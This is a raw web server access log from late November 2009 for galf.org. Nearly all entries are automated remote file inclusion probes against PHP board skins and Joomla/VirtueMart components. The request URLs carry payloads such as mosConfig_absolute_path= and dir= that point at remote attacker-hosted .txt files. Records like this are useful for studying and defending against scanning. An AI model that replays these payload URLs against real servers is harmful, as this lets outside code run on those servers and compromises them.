218.234.21.178 - - [29/Nov/2009:20:46:47 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
218.234.21.178 - - [29/Nov/2009:20:46:47 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
211.51.139.133 - - [29/Nov/2009:20:47:23 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
211.51.139.133 - - [29/Nov/2009:20:47:23 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
211.51.139.133 - - [29/Nov/2009:20:47:23 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:29 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:29 -0800] "GET /logs/access_090928.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:29 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:38 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:38 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:38 -0800] "GET /logs/access_090928.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:42 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:42 -0800] "GET /logs/access_090928.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:42 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:45 -0800] "GET /logs/access_090622.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:47 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:47 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:47 -0800] "GET /logs/access_090928.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:47:52 -0800] "GET /logs/access_090622.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:08 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:08 -0800] "GET /logs/access.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:08 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:09 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:09 -0800] "GET /logs/access.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:09 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:19 -0800] "GET /logs/access_090629.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:19 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:19 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:21 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:21 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:21 -0800] "GET /logs/access_090629.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:37 -0800] "GET /logs/access_090928.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:37 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:37 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.60.116 - - [29/Nov/2009:20:48:41 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:41 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:41 -0800] "GET /logs/access.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.60.116 - - [29/Nov/2009:20:48:41 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
222.231.60.116 - - [29/Nov/2009:20:48:41 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:42 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [29/Nov/2009:20:48:45 -0800] "GET /skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [29/Nov/2009:20:48:45 -0800] "GET /logs/access_090921.log//skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:46 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:46 -0800] "GET /logs/access.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [29/Nov/2009:20:48:46 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [29/Nov/2009:20:48:48 -0800] "GET /logs//skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:50 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:50 -0800] "GET /logs/access_090622.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:50 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:51 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:51 -0800] "GET /logs/access.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:52 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:57 -0800] "GET /bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:57 -0800] "GET /logs/access_090622.log//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:48:58 -0800] "GET /logs//bbs/skin/ggambo6210////setup.php?setup[use_category]=1&dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:30 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:30 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:30 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:38 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:38 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:50:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:00 -0800] "GET /logs/access_090720.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:00 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:00 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:11 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:11 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:51:16 -0800] "GET /logs/access_090720.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [29/Nov/2009:20:51:50 -0800] "GET /skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [29/Nov/2009:20:51:50 -0800] "GET /logs//skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [29/Nov/2009:20:51:50 -0800] "GET /logs/access_090921.log//skin/ruvin_fine_gall2/setup.php?dir=http://www.prestigemarketinggroup.net/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:52:19 -0800] "GET /logs/access_091116.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:20:53:05 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:20:53:10 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:20:54:00 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:07 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:34 -0800] "GET /logs/access_091116.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:54:42 -0800] "GET /logs/access_091116.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:56:23 -0800] "GET /logs/access_091116.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:56:27 -0800] "GET /logs/access_091116.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:06:37 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:06:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:06:37 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.136 - - [29/Nov/2009:21:16:49 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:17:09 -0800] "GET /include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:17:09 -0800] "GET /logs//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:17:14 -0800] "GET /logs/access_090504.log//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:21:19:03 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:19:14 -0800] "GET /include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:19:14 -0800] "GET /logs/access_090504.log//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:21:19:14 -0800] "GET /logs//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [29/Nov/2009:21:19:46 -0800] "GET /logs/access_090824.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /logs/access_090622.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:21:20:49 -0800] "GET /logs/access_090622.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:21:38:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:21:38:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [29/Nov/2009:21:38:34 -0800] "GET /logs/access_090504.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:01 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:01 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:01 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:36 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:37 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:39:37 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [29/Nov/2009:21:42:17 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
